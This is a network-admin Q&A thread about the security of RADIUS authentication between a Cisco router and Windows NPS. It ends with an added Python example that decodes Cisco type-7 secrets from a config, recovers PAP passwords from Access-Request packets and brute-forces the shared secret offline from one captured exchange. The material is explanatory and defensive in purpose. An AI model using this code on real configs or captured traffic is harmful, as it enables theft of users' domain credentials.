
I set up RADIUS authentication on a Cisco router and pointed it at a Windows NPS. Now I can SSH into the router with my AD account, yay.

But now that I have it working, I'm going over the settings to make sure everything is secure.

On my router the config is pretty simple:

aaa new-model
aaa group server radius WINDOWS_NPS
server-private 123.123.123.123 auth-port 1812 acct-port 1813 key mykey
aaa authentication login default local group WINDOWS_NPS

ip domain-name MyDom
crypto key generate rsa

(under vty and console)# login authentication default

On the Windows NPS:

  • I created a new RADIUS client for the router.
  • Created a shared secret and specified Cisco as Vendor Name.
  • Created a new Network Policy with my desired conditions.
  • And now the part of the Network Policy config that worries me:

[screenshot of the Network Policy's authentication methods settings, not reproduced]

I read that Cisco only supports the unencrypted method, but I thought that using any authentication method here that does NOT use certificates is incredibly insecure (even MS-CHAP-v2 is said to be super insecure).

So are my AD credentials being sent over the wire in plain text?

My other question is: if a hacker gets my RADIUS shared secret, what do they really have? If the shared secret is compromised, must I generate a new one on all of my routers?

red888

1 Answer


First, I know this is oldish, but I want to clear the record for posterity.

You are right to be VERY concerned; however, neither Cisco nor any other vendor seems that interested in fixing the issues you identified. When using RADIUS (or TACACS+) for authentication, your password is encrypted using the shared key you configured. Note that the shared key is stored as a type-7 in the config, meaning anyone with the config can crack the type 7 and recover the key. Plug the key into Wireshark and all your passwords and two-factor PINs become instantly broken. Furthermore, the encryption used by RADIUS and TACACS+ is based on MD5 hashes, which are considered very insecure, so brute-forcing a secret is not out of the question.

At this point the best you can do is ensure that the keys you use are very strong. I would recommend using something like https://www.random.org/passwords/ and generating unique keys at least 12 characters long, which SHOULD make brute-forcing the keys impossible.

Also, ensure that only trusted individuals have the config and are able to see the RADIUS or TACACS+ shared secret.

Thirdly, watch for new versions of switch IOS late this year that support a feature called "Secure Reversible Passwords for AAA". This is currently supported on very late code for ISR routers and securely encrypts the key, eliminating some of that vulnerability.

Lastly, complain LOUDLY to Cisco and other vendors about these issues. My recommended solutions are universal support for MSCHAPv2, which IS breakable (DES equivalent) but still far better than clear text, and support for REAL encryption, either by using the existing PEAPv1-MSCHAPv2 and PEAPv1-GTC algorithms on the client side, creation of STACACS+ (TACACS over SSL), or implementation of DIAMETER.
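The chain the answer describes (leaked config, type-7 decode, shared secret, password recovered from a capture) is short enough to show end to end. The following is an added example, not code from the question or the answer above. It assumes the router has `service password-encryption` on, so the `key mykey` line from the question appears as `key 7 <hex>` in a saved config; the Access-Request and Access-Accept packets are constructed here with a made-up user and password rather than taken from a real capture, and the NAS-to-NPS exchange is modelled only as far as RFC 2865 defines it (PAP User-Password hiding and the Response Authenticator).

```python
"""Added example (not from the original post): what a leaked Cisco config or a
leaked RADIUS shared secret gives an attacker who can also sniff the traffic.

Assumptions: 'service password-encryption' is enabled, so the shared secret sits
in the config as 'key 7 <hex>'; the packets below are constructed, not captured.
"""
import hashlib
import os
import struct

# Cisco type-7 XOR key as used by the well-known decoders; the two leading
# decimal digits of a type-7 string are the starting offset into this key.
_TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def type7_encode(plain, seed=8):
    """Produce what 'service password-encryption' writes into the config."""
    out = [f"{seed:02d}"]
    for i, ch in enumerate(plain.encode()):
        out.append(f"{ch ^ _TYPE7_KEY[(seed + i) % len(_TYPE7_KEY)]:02X}")
    return "".join(out)


def type7_decode(encoded):
    """Type 7 is a fixed-key XOR, so recovery is instant and needs no cracking."""
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    return bytes(b ^ _TYPE7_KEY[(seed + i) % len(_TYPE7_KEY)]
                 for i, b in enumerate(data)).decode()


def radius_key_from_config(config):
    """Pull the shared secret out of a 'server-private ... key [7] <value>' line."""
    for line in config.splitlines():
        tokens = line.split()
        if "key" in tokens:
            k = tokens.index("key")
            if tokens[k + 1] == "7":
                return type7_decode(tokens[k + 2])
            return tokens[k + 1]  # stored in clear text, nothing to decode
    raise ValueError("no RADIUS key in config")


def hide_password(password, secret, req_auth):
    """RFC 2865 section 5.2: pad to 16 bytes, XOR each block with an MD5 keystream
    chained on the previous ciphertext block. This is all that protects PAP."""
    password += b"\0" * (-len(password) % 16)
    out, prev = b"", req_auth
    for i in range(0, len(password), 16):
        block = hashlib.md5(secret + prev).digest()
        prev = bytes(x ^ y for x, y in zip(password[i:i + 16], block))
        out += prev
    return out


def unhide_password(hidden, secret, req_auth):
    """Same keystream: the secret plus the packet on the wire yields the password."""
    out, prev = b"", req_auth
    for i in range(0, len(hidden), 16):
        block = hashlib.md5(secret + prev).digest()
        out += bytes(x ^ y for x, y in zip(hidden[i:i + 16], block))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\0")


def build_access_request(user, password, secret, ident=1):
    """Minimal Access-Request (code 1): User-Name (type 1), User-Password (type 2)."""
    req_auth = os.urandom(16)  # Request Authenticator, sent in the clear
    attrs = bytes([1, 2 + len(user)]) + user
    hidden = hide_password(password, secret, req_auth)
    attrs += bytes([2, 2 + len(hidden)]) + hidden
    return struct.pack("!BBH", 1, ident, 20 + len(attrs)) + req_auth + attrs


def parse_attrs(packet):
    """Walk the type/length/value attributes that follow the 20-byte header."""
    attrs, pos = {}, 20
    while pos < len(packet):
        attr_type, attr_len = packet[pos], packet[pos + 1]
        attrs[attr_type] = packet[pos + 2:pos + attr_len]
        pos += attr_len
    return attrs


def recover_password(packet, secret):
    """What Wireshark does once you give it the shared secret."""
    return unhide_password(parse_attrs(packet)[2], secret, packet[4:20])


def build_access_accept(request, secret):
    """Access-Accept (code 2) with no attributes. Response Authenticator =
    MD5(code | id | length | Request Authenticator | attributes | secret)."""
    hdr = struct.pack("!BBH", 2, request[1], 20)
    return hdr + hashlib.md5(hdr + request[4:20] + secret).digest()


def guess_secret(request, response, candidates):
    """Offline guessing of the shared secret from one captured request/response
    pair: one MD5 per candidate, no traffic to the NAS or the NPS."""
    for cand in candidates:
        digest = hashlib.md5(response[:4] + request[4:20] + response[20:] + cand).digest()
        if digest == response[4:20]:
            return cand
    return None


if __name__ == "__main__":
    # Constructed config line: the question's 'key mykey' after password-encryption.
    config = ("server-private 123.123.123.123 auth-port 1812 acct-port 1813 key 7 "
              + type7_encode("mykey"))
    secret = radius_key_from_config(config).encode()
    req = build_access_request(b"alice", b"Winter2024!", secret)  # constructed login
    print("secret from config:", secret, "password on the wire:", recover_password(req, secret))
```

The two attacker positions the answer distinguishes map onto the last two functions: `recover_password` needs the secret already (from the config or elsewhere) and is silent, while `guess_secret` needs only one captured Access-Request plus its Access-Accept and turns the secret into an offline MD5 guessing exercise, which is why short or reused secrets matter more than they first appear.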